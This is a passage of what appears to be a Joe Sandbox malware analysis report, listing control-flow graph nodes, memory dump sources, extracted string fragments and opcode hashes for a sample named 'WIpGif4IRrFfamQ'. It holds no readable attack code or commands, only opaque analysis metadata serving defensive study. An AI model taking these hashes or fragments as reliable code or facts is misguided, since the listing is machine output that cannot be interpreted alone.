13f74d3-13f74d9 388->394 395 13f75b7-13f75c3 389->395 396 13f75b5 389->396 393->394 394->322 400 13f74db-13f74e0 394->400 399 13f75c5-13f75de 395->399 396->399 398->373 399->375 416 13f75e0-13f75e2 399->416 400->387 404 13f74b6-13f74b9 400->404 401->411 417 13f72da-13f72df 401->417 402->359 415 13f7311-13f7314 402->415 404->359 404->386 410->411 419 13f739a-13f739e 411->419 420 13f73a5-13f73ad 411->420 415->359 421 13f731a-13f7343 415->421 416->356 417->411 422 13f73bd-13f73c1 419->422 423 13f73a0-13f73a3 419->423 420->359 424 13f73b3-13f73b8 420->424 421->411 436 13f7345-13f734a 421->436 425 13f73c3-13f73c9 422->425 426 13f73e0-13f73e4 422->426 423->420 423->422 424->351 425->426 428 13f73cb-13f73d3 425->428 429 13f73ee-13f740d call 13f76f1 426->429 430 13f73e6-13f73ec 426->430 428->359 431 13f73d9-13f73de 428->431 433 13f7413-13f7417 429->433 430->429 430->433 431->351 433->351 434 13f7419-13f7435 433->434 434->351 436->411 437->297 438->297 439->297 441->290 442->290 443->290
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o]q$(o]q$(o]q$,aq$,aq
                                                                                • API String ID: 0-615190528
                                                                                • Opcode ID: e46ada1aeb63304489b6997b70ea1106b2e501038747313acffb16b3d2ccf9c7
                                                                                • Instruction ID: faf035c62258e1aa06455059b517b5fd8d2dd307a7762a0768563b698e82ac0b
                                                                                • Opcode Fuzzy Hash: e46ada1aeb63304489b6997b70ea1106b2e501038747313acffb16b3d2ccf9c7
                                                                                • Instruction Fuzzy Hash: 17222A30A00259DFDB15CF69C888AADBBF6FF88318F55846AEA05EB265D734DC41CB50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 555 13fc146-13fc158 556 13fc15a-13fc172 555->556 557 13fc184 555->557 561 13fc17b 556->561 562 13fc174 556->562 558 13fc186-13fc18a 557->558 564 13fc17c-13fc17e 561->564 563 13fc178-13fc179 562->563 563->558 565 13fc17f 564->565 566 13fc18b-13fc199 564->566 567 13fc180-13fc182 565->567 566->563 569 13fc19b-13fc19d 566->569 567->556 567->557 569->564 570 13fc19f-13fc1a1 569->570 570->567 571 13fc1a3-13fc1c8 570->571 572 13fc1cf-13fc2ac call 13f41a0 call 13f3cc0 571->572 573 13fc1ca 571->573 583 13fc2ae 572->583 584 13fc2b3-13fc2d4 call 13f5658 572->584 573->572 583->584 586 13fc2d9-13fc2e4 584->586 587 13fc2eb-13fc2ef 586->587 588 13fc2e6 586->588 589 13fc2f4-13fc2fb 587->589 590 13fc2f1-13fc2f2 587->590 588->587 592 13fc2fd 589->592 593 13fc302-13fc310 589->593 591 13fc313-13fc357 590->591 597 13fc3bd-13fc3d4 591->597 592->593 593->591 599 13fc359-13fc36f 597->599 600 13fc3d6-13fc3fb 597->600 604 13fc399 599->604 605 13fc371-13fc37d 599->605 607 13fc3fd-13fc412 600->607 608 13fc413 600->608 606 13fc39f-13fc3bc 604->606 609 13fc37f-13fc385 605->609 610 13fc387-13fc38d 605->610 606->597 607->608 611 13fc397 609->611 610->611 611->606
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
                                                                                • API String ID: 0-3689317755
                                                                                • Opcode ID: ddd55c84eb4e8a323ba42e2c43644dbff70fc63c199390bfda8bcf7e4fcdf0ea
                                                                                • Instruction ID: f09cc57802f5d9b8a026258c1c7b86c0b2e9158f08c8c9d83dccef9ee06252f9
                                                                                • Opcode Fuzzy Hash: ddd55c84eb4e8a323ba42e2c43644dbff70fc63c199390bfda8bcf7e4fcdf0ea
                                                                                • Instruction Fuzzy Hash: A3A10474E40218CFDB18DFAAD984A9DBBF2FF89304F14906AE508AB365DB349941CF50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 615 13f5362-13f5364 616 13f5366-13f53a0 615->616 617 13f53c4-13f5484 call 13f41a0 call 13f3cc0 615->617 618 13f53a7-13f53c2 616->618 619 13f53a2 616->619 629 13f548b-13f54a9 617->629 630 13f5486 617->630 618->617 619->618 660 13f54ac call 13f5649 629->660 661 13f54ac call 13f5658 629->661 630->629 631 13f54b2-13f54bd 632 13f54bf 631->632 633 13f54c4-13f54c8 631->633 632->633 634 13f54cd-13f54d4 633->634 635 13f54ca-13f54cb 633->635 637 13f54db-13f54e9 634->637 638 13f54d6 634->638 636 13f54ec-13f5530 635->636 642 13f5596-13f55ad 636->642 637->636 638->637 644 13f55af-13f55d4 642->644 645 13f5532-13f5548 642->645 651 13f55ec 644->651 652 13f55d6-13f55eb 644->652 649 13f554a-13f5556 645->649 650 13f5572 645->650 653 13f5558-13f555e 649->653 654 13f5560-13f5566 649->654 655 13f5578-13f5595 650->655 652->651 656 13f5570 653->656 654->656 655->642 656->655 660->631 661->631
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
                                                                                • API String ID: 0-3689317755
                                                                                • Opcode ID: 2ede261a0e27dbcbd29660cbf193488bf04c47b9b1afbeec5d49865ee1dbfdfb
                                                                                • Instruction ID: 2c54182c18dbe98668d03fd87effd73be2c3bb7bdbedd4164b94e32517c5c935
                                                                                • Opcode Fuzzy Hash: 2ede261a0e27dbcbd29660cbf193488bf04c47b9b1afbeec5d49865ee1dbfdfb
                                                                                • Instruction Fuzzy Hash: 0991D474E00218CFDB18CFAAD984A9DBBF2BF89304F15C069E509AB365DB349985CF50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 662 13fcd28-13fcd58 663 13fcd5f-13fce3c call 13f41a0 call 13f3cc0 662->663 664 13fcd5a 662->664 674 13fce3e 663->674 675 13fce43-13fce64 call 13f5658 663->675 664->663 674->675 677 13fce69-13fce74 675->677 678 13fce7b-13fce7f 677->678 679 13fce76 677->679 680 13fce84-13fce8b 678->680 681 13fce81-13fce82 678->681 679->678 683 13fce8d 680->683 684 13fce92-13fcea0 680->684 682 13fcea3-13fcee7 681->682 688 13fcf4d-13fcf64 682->688 683->684 684->682 690 13fcee9-13fceff 688->690 691 13fcf66-13fcf8b 688->691 694 13fcf29 690->694 695 13fcf01-13fcf0d 690->695 697 13fcf8d-13fcfa2 691->697 698 13fcfa3 691->698 701 13fcf2f-13fcf4c 694->701 699 13fcf0f-13fcf15 695->699 700 13fcf17-13fcf1d 695->700 697->698 702 13fcf27 699->702 700->702 701->688 702->701
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
                                                                                • API String ID: 0-3689317755
                                                                                • Opcode ID: ec68249d6f23a9d48f42b1e6d5b2cbe53124506d36cc293180b5943929aa3995
                                                                                • Instruction ID: b8e84132140f32a40b6a21aba7ab627702a78f1acd8738a9890a23cf11b3849f
                                                                                • Opcode Fuzzy Hash: ec68249d6f23a9d48f42b1e6d5b2cbe53124506d36cc293180b5943929aa3995
                                                                                • Instruction Fuzzy Hash: E281B474E00218CFDB18DFAAD994A9DFBF2BF88314F149069E518AB365DB309985CF50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 706 13fcff7-13fd028 707 13fd02f-13fd10c call 13f41a0 call 13f3cc0 706->707 708 13fd02a 706->708 718 13fd10e 707->718 719 13fd113-13fd134 call 13f5658 707->719 708->707 718->719 721 13fd139-13fd144 719->721 722 13fd14b-13fd14f 721->722 723 13fd146 721->723 724 13fd154-13fd15b 722->724 725 13fd151-13fd152 722->725 723->722 727 13fd15d 724->727 728 13fd162-13fd170 724->728 726 13fd173-13fd1b7 725->726 732 13fd21d-13fd234 726->732 727->728 728->726 734 13fd1b9-13fd1cf 732->734 735 13fd236-13fd25b 732->735 739 13fd1f9 734->739 740 13fd1d1-13fd1dd 734->740 741 13fd25d-13fd272 735->741 742 13fd273 735->742 745 13fd1ff-13fd21c 739->745 743 13fd1df-13fd1e5 740->743 744 13fd1e7-13fd1ed 740->744 741->742 746 13fd1f7 743->746 744->746 745->732 746->745
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
                                                                                • API String ID: 0-3689317755
                                                                                • Opcode ID: 3149e8ac604987521e85d21d77fc0fc04677c249847392e414dc99d85bea4ffc
                                                                                • Instruction ID: 6608630ed086edb4eeb7b627ad1d58dddc9675244b1525975b83c77f2dca2c8b
                                                                                • Opcode Fuzzy Hash: 3149e8ac604987521e85d21d77fc0fc04677c249847392e414dc99d85bea4ffc
                                                                                • Instruction Fuzzy Hash: AF81D574E00218CFDB58DFAAD884A9DBBF2BF88314F14C169E918AB365DB309945CF50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 750 13fd2c8-13fd2f8 751 13fd2ff-13fd3dc call 13f41a0 call 13f3cc0 750->751 752 13fd2fa 750->752 762 13fd3de 751->762 763 13fd3e3-13fd404 call 13f5658 751->763 752->751 762->763 765 13fd409-13fd414 763->765 766 13fd41b-13fd41f 765->766 767 13fd416 765->767 768 13fd424-13fd42b 766->768 769 13fd421-13fd422 766->769 767->766 771 13fd42d 768->771 772 13fd432-13fd440 768->772 770 13fd443-13fd487 769->770 776 13fd4ed-13fd504 770->776 771->772 772->770 778 13fd489-13fd49f 776->778 779 13fd506-13fd52b 776->779 783 13fd4c9 778->783 784 13fd4a1-13fd4ad 778->784 785 13fd52d-13fd542 779->785 786 13fd543 779->786 789 13fd4cf-13fd4ec 783->789 787 13fd4af-13fd4b5 784->787 788 13fd4b7-13fd4bd 784->788 785->786 790 13fd4c7 787->790 788->790 789->776 790->789
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
                                                                                • API String ID: 0-3689317755
                                                                                • Opcode ID: 960c3097d902add054ce6f92ce7ff6c4a5f43d487c8903edf29448921225e72a
                                                                                • Instruction ID: 371bd88e086920ffb110ef5759f3643530d2bac54f1cdd9a1cccc655c10768b6
                                                                                • Opcode Fuzzy Hash: 960c3097d902add054ce6f92ce7ff6c4a5f43d487c8903edf29448921225e72a
                                                                                • Instruction Fuzzy Hash: 5F81C474E00218CFDB18DFAAD984A9DBBF2BF89304F14C069E518AB365DB349985CF10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 838 13fd599-13fd5c8 839 13fd5cf-13fd6ac call 13f41a0 call 13f3cc0 838->839 840 13fd5ca 838->840 850 13fd6ae 839->850 851 13fd6b3-13fd6d4 call 13f5658 839->851 840->839 850->851 853 13fd6d9-13fd6e4 851->853 854 13fd6eb-13fd6ef 853->854 855 13fd6e6 853->855 856 13fd6f4-13fd6fb 854->856 857 13fd6f1-13fd6f2 854->857 855->854 859 13fd6fd 856->859 860 13fd702-13fd710 856->860 858 13fd713-13fd757 857->858 864 13fd7bd-13fd7d4 858->864 859->860 860->858 866 13fd759-13fd76f 864->866 867 13fd7d6-13fd7fb 864->867 871 13fd799 866->871 872 13fd771-13fd77d 866->872 874 13fd7fd-13fd812 867->874 875 13fd813 867->875 873 13fd79f-13fd7bc 871->873 876 13fd77f-13fd785 872->876 877 13fd787-13fd78d 872->877 873->864 874->875 878 13fd797 876->878 877->878 878->873
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
                                                                                • API String ID: 0-3689317755
                                                                                • Opcode ID: 27efd50ffeae33fc796a744fc1e9c46c342bd9a461d00ccf6d2fe79716df0ba4
                                                                                • Instruction ID: eba4b2165bd2bec06af784b93ca8b9a76fbad694a3fe6fd61c9a8ca85d2a958c
                                                                                • Opcode Fuzzy Hash: 27efd50ffeae33fc796a744fc1e9c46c342bd9a461d00ccf6d2fe79716df0ba4
                                                                                • Instruction Fuzzy Hash: 9F81C274E00258CFDB18DFAAD984A9DBBF2BF88314F14C169E519AB365DB309985CF10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 794 13fc738-13fc768 795 13fc76f-13fc7ce call 13f41a0 794->795 796 13fc76a 794->796 800 13fc7d3-13fc84c call 13f3cc0 795->800 796->795 806 13fc84e 800->806 807 13fc853-13fc884 call 13f5658 800->807 806->807 810 13fc88b-13fc88f 807->810 811 13fc886 807->811 812 13fc894-13fc89b 810->812 813 13fc891-13fc892 810->813 811->810 815 13fc89d 812->815 816 13fc8a2-13fc8b0 812->816 814 13fc8b3-13fc8f7 813->814 820 13fc95d-13fc974 814->820 815->816 816->814 822 13fc8f9-13fc90f 820->822 823 13fc976-13fc99b 820->823 827 13fc939 822->827 828 13fc911-13fc91d 822->828 829 13fc99d-13fc9b2 823->829 830 13fc9b3 823->830 833 13fc93f-13fc95c 827->833 831 13fc91f-13fc925 828->831 832 13fc927-13fc92d 828->832 829->830 834 13fc937 831->834 832->834 833->820 834->833
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0odp$Ljdp$Ljdp$PH]q$PH]q
                                                                                • API String ID: 0-3689317755
                                                                                • Opcode ID: 59e54412146b62b3035c168bd12809cae9297c544ae0f3bd1b065e2c6a73001e
                                                                                • Instruction ID: c686bc906a1c4e53a4c1ae70d1414faf3db00ddb916726ca200df196deb67a88
                                                                                • Opcode Fuzzy Hash: 59e54412146b62b3035c168bd12809cae9297c544ae0f3bd1b065e2c6a73001e
                                                                                • Instruction Fuzzy Hash: CE81B374E00218CFDB18DFAAD984A9DBBF2BF88314F14D069E518AB365DB309945CF50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o]q$4']q$4']q$4']q
                                                                                • API String ID: 0-875651895
                                                                                • Opcode ID: cdb74a88f23c8d1d9af5ba087cf4cd789a3ee0a52acb267d485894920047c9da
                                                                                • Instruction ID: fa02b6b40eb6891354cb65a9b1d68f3d91334a385263c3f99780c3d54125fd0d
                                                                                • Opcode Fuzzy Hash: cdb74a88f23c8d1d9af5ba087cf4cd789a3ee0a52acb267d485894920047c9da
                                                                                • Instruction Fuzzy Hash: 99A29F34A00209CFDB15CFA8C984AAEBBF6FF88314F158569E609DB366D734E845CB51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o]q$Haq
                                                                                • API String ID: 0-903699183
                                                                                • Opcode ID: a3d341c36392acf712b7527a8846411bebc799d952ff3b5374280bfc5ddac547
                                                                                • Instruction ID: cd6502847ade14a296419dda13aedc761cad22d836c8004e02898d173329023f
                                                                                • Opcode Fuzzy Hash: a3d341c36392acf712b7527a8846411bebc799d952ff3b5374280bfc5ddac547
                                                                                • Instruction Fuzzy Hash: FE127DB0A0021A8FDB15DF69C854AAEBBF6FF88304F108559E945DB395DF309D46CB90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2745 13f3e09-13f3e25 2746 13f3e2e-13f3e3e 2745->2746 2747 13f3e27-13f3e29 2745->2747 2749 13f3e45-13f3e55 2746->2749 2750 13f3e40 2746->2750 2748 13f40cc-13f40d3 2747->2748 2752 13f3e5b-13f3e69 2749->2752 2753 13f40b3-13f40c1 2749->2753 2750->2748 2756 13f3e6f 2752->2756 2757 13f40d4-13f41ba 2752->2757 2753->2757 2758 13f40c3-13f40c7 call 13f02c8 2753->2758 2756->2757 2759 13f3f9f-13f3fc7 2756->2759 2760 13f3eda-13f3efb 2756->2760 2761 13f4039-13f4065 2756->2761 2762 13f3e76-13f3e88 2756->2762 2763 13f3eb3-13f3ed5 2756->2763 2764 13f3f72-13f3f9a 2756->2764 2765 13f400e-13f4034 2756->2765 2766 13f3e8d-13f3eae 2756->2766 2767 13f3f4c-13f3f6d 2756->2767 2768 13f3fcc-13f4009 2756->2768 2769 13f4067-13f4082 call 13f02d8 2756->2769 2770 13f40a7-13f40b1 2756->2770 2771 13f3f26-13f3f47 2756->2771 2772 13f4084-13f40a5 call 13f28f0 2756->2772 2773 13f3f00-13f3f21 2756->2773 2827 13f41bc 2757->2827 2828 13f41c1-13f42c9 call 13f2358 call 13f2368 call 13f2378 call 13f2388 call 13f02e4 2757->2828 2758->2748 2759->2748 2760->2748 2761->2748 2762->2748 2763->2748 2764->2748 2765->2748 2766->2748 2767->2748 2768->2748 2769->2748 2770->2748 2771->2748 2772->2748 2773->2748 2827->2828 2846 13f42cf-13f435f 2828->2846
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xaq$$]q
                                                                                • API String ID: 0-1280934391
                                                                                • Opcode ID: 615b9b44b9dfc9ffbce546b42ff9499c0cdddd08a3b25c030a332a8ef1629b7a
                                                                                • Instruction ID: ede41c51d02fbae80c795cb05beb381cd565203577a762846a50fc75e08de558
                                                                                • Opcode Fuzzy Hash: 615b9b44b9dfc9ffbce546b42ff9499c0cdddd08a3b25c030a332a8ef1629b7a
                                                                                • Instruction Fuzzy Hash: DFF16B74E0021ADFCB18DFB9D8945AEBBB6FF89310B14892DE506E7358CB359802CB51
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4481536621.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6b60000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8742980a70c7a734c28f634a9796b98e6a9c5fef13c1962ed59b9e6fe862fedd
                                                                                • Instruction ID: cfb4a719cf3b9070e287900eb9b9c8801a7a6b3c786ec18a133d332386285d36
                                                                                • Opcode Fuzzy Hash: 8742980a70c7a734c28f634a9796b98e6a9c5fef13c1962ed59b9e6fe862fedd
                                                                                • Instruction Fuzzy Hash: 7E225EB0E01219CFDB54DFA9C884B9DBBB2BF84304F1085A9E409AB355DB349D85CF90
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0cfa9ab5e8235b20127db5c9886a3c6c4ebb9106fd063ffecd204e4cf2790cb2
                                                                                • Instruction ID: bde1fc0d438d0c34875965f7b69e890b9980e7509a37fb49f2959fb9288fe45f
                                                                                • Opcode Fuzzy Hash: 0cfa9ab5e8235b20127db5c9886a3c6c4ebb9106fd063ffecd204e4cf2790cb2
                                                                                • Instruction Fuzzy Hash: 9A51A574E00318DFDB18DFAAD994A9DFBB6BF88300F209129E919AB365DB345845CF14
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9eb006b1780ceb7bdc1dde26096f50b286d4a8319f5d071e5ba51a269ea77569
                                                                                • Instruction ID: af4265341914b3408431e9d12828e469be0e1a515a2dc8bbf24b504382382ee9
                                                                                • Opcode Fuzzy Hash: 9eb006b1780ceb7bdc1dde26096f50b286d4a8319f5d071e5ba51a269ea77569
                                                                                • Instruction Fuzzy Hash: AB51B674E00218DFDB18DFAAD984A9DFBB6BF88300F24D169E915AB369DB345845CF04

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 13f76f1-13f7725 1 13f772b-13f774e 0->1 2 13f7b54-13f7b58 0->2 11 13f77fc-13f7800 1->11 12 13f7754-13f7761 1->12 3 13f7b5a-13f7b6e 2->3 4 13f7b71-13f7b7f 2->4 9 13f7b81-13f7b96 4->9 10 13f7bf0-13f7c05 4->10 20 13f7b9d-13f7baa 9->20 21 13f7b98-13f7b9b 9->21 22 13f7c0c-13f7c19 10->22 23 13f7c07-13f7c0a 10->23 13 13f7848-13f7851 11->13 14 13f7802-13f7810 11->14 26 13f7763-13f776e 12->26 27 13f7770 12->27 17 13f7c67 13->17 18 13f7857-13f7861 13->18 14->13 35 13f7812-13f782d 14->35 36 13f7c6c-13f7c9c 17->36 18->2 24 13f7867-13f7870 18->24 28 13f7bac-13f7bed 20->28 21->28 29 13f7c1b-13f7c56 22->29 23->29 33 13f787f-13f788b 24->33 34 13f7872-13f7877 24->34 30 13f7772-13f7774 26->30 27->30 77 13f7c5d-13f7c64 29->77 30->11 37 13f777a-13f77dc 30->37 33->36 40 13f7891-13f7897 33->40 34->33 60 13f782f-13f7839 35->60 61 13f783b 35->61 53 13f7c9e-13f7cb4 36->53 54 13f7cb5-13f7cbc 36->54 88 13f77de 37->88 89 13f77e2-13f77f9 37->89 43 13f7b3e-13f7b42 40->43 44 13f789d-13f78ad 40->44 43->17 47 13f7b48-13f7b4e 43->47 58 13f78af-13f78bf 44->58 59 13f78c1-13f78c3 44->59 47->2 47->24 62 13f78c6-13f78cc 58->62 59->62 63 13f783d-13f783f 60->63 61->63 62->43 64 13f78d2-13f78e1 62->64 63->13 65 13f7841 63->65 72 13f798f-13f79ba call 13f7538 * 2 64->72 73 13f78e7 64->73 65->13 90 13f7aa4-13f7abe 72->90 91 13f79c0-13f79c4 72->91 75 13f78ea-13f78fb 73->75 75->36 79 13f7901-13f7913 75->79 79->36 81 13f7919-13f7931 79->81 144 13f7933 call 13f80c9 81->144 145 13f7933 call 13f80d8 81->145 84 13f7939-13f7949 84->43 87 13f794f-13f7952 84->87 92 13f795c-13f795f 87->92 93 13f7954-13f795a 87->93 88->89 89->11 90->2 113 13f7ac4-13f7ac8 90->113 91->43 95 13f79ca-13f79ce 91->95 92->17 96 13f7965-13f7968 92->96 93->92 93->96 98 13f79f6-13f79fc 95->98 99 13f79d0-13f79dd 95->99 100 13f796a-13f796e 96->100 101 13f7970-13f7973 96->101 102 13f79fe-13f7a02 98->102 103 13f7a37-13f7a3d 98->103 116 13f79df-13f79ea 99->116 117 13f79ec 99->117 100->101 104 13f7979-13f797d 100->104 101->17 101->104 102->103 105 13f7a04-13f7a0d 102->105 106 13f7a3f-13f7a43 103->106 107 13f7a49-13f7a4f 103->107 104->17 110 13f7983-13f7989 104->110 111 13f7a0f-13f7a14 105->111 112 13f7a1c-13f7a32 105->112 106->77 106->107 114 13f7a5b-13f7a5d 107->114 115 13f7a51-13f7a55 107->115 110->72 110->75 111->112 112->43 118 13f7aca-13f7ad4 call 13f63e0 113->118 119 13f7b04-13f7b08 113->119 120 13f7a5f-13f7a68 114->120 121 13f7a92-13f7a94 114->121 115->43 115->114 122 13f79ee-13f79f0 116->122 117->122 118->119 133 13f7ad6-13f7aeb 118->133 119->77 125 13f7b0e-13f7b12 119->125 128 13f7a6a-13f7a6f 120->128 129 13f7a77-13f7a8d 120->129 121->43 123 13f7a9a-13f7aa1 121->123 122->43 122->98 125->77 130 13f7b18-13f7b25 125->130 128->129 129->43 136 13f7b27-13f7b32 130->136 137 13f7b34 130->137 133->119 141 13f7aed-13f7b02 133->141 138 13f7b36-13f7b38 136->138 137->138 138->43 138->77 141->2 141->119 144->84 145->84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                • API String ID: 0-1435242062
                                                                                • Opcode ID: c2c458de9201713439362055c0db3a57d39a0e9543dcf97ec351ed8bf1c1fbd5
                                                                                • Instruction ID: 5a12ed43ca4279b0da34bb4290d7099fb2c9b822e7abb6b11e52f467b6303d57
                                                                                • Opcode Fuzzy Hash: c2c458de9201713439362055c0db3a57d39a0e9543dcf97ec351ed8bf1c1fbd5
                                                                                • Instruction Fuzzy Hash: D0126A30A006098FCB25CF68D984AAEBBF6FF49318F1585A9E649DB361D730ED45CB50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2282 13f8490-13f897e 2357 13f8984-13f8994 2282->2357 2358 13f8ed0-13f8f05 2282->2358 2357->2358 2359 13f899a-13f89aa 2357->2359 2362 13f8f07-13f8f0c 2358->2362 2363 13f8f11-13f8f2f 2358->2363 2359->2358 2361 13f89b0-13f89c0 2359->2361 2361->2358 2364 13f89c6-13f89d6 2361->2364 2365 13f8ff6-13f8ffb 2362->2365 2376 13f8fa6-13f8fb2 2363->2376 2377 13f8f31-13f8f3b 2363->2377 2364->2358 2366 13f89dc-13f89ec 2364->2366 2366->2358 2368 13f89f2-13f8a02 2366->2368 2368->2358 2369 13f8a08-13f8a18 2368->2369 2369->2358 2371 13f8a1e-13f8a2e 2369->2371 2371->2358 2372 13f8a34-13f8a44 2371->2372 2372->2358 2373 13f8a4a-13f8a5a 2372->2373 2373->2358 2375 13f8a60-13f8ecf 2373->2375 2382 13f8fc9-13f8fd5 2376->2382 2383 13f8fb4-13f8fc0 2376->2383 2377->2376 2381 13f8f3d-13f8f49 2377->2381 2388 13f8f6e-13f8f71 2381->2388 2389 13f8f4b-13f8f56 2381->2389 2392 13f8fec-13f8fee 2382->2392 2393 13f8fd7-13f8fe3 2382->2393 2383->2382 2391 13f8fc2-13f8fc7 2383->2391 2394 13f8f88-13f8f94 2388->2394 2395 13f8f73-13f8f7f 2388->2395 2389->2388 2403 13f8f58-13f8f62 2389->2403 2391->2365 2392->2365 2393->2392 2401 13f8fe5-13f8fea 2393->2401 2396 13f8ffc-13f901e 2394->2396 2397 13f8f96-13f8f9d 2394->2397 2395->2394 2407 13f8f81-13f8f86 2395->2407 2408 13f902e 2396->2408 2409 13f9020 2396->2409 2397->2396 2402 13f8f9f-13f8fa4 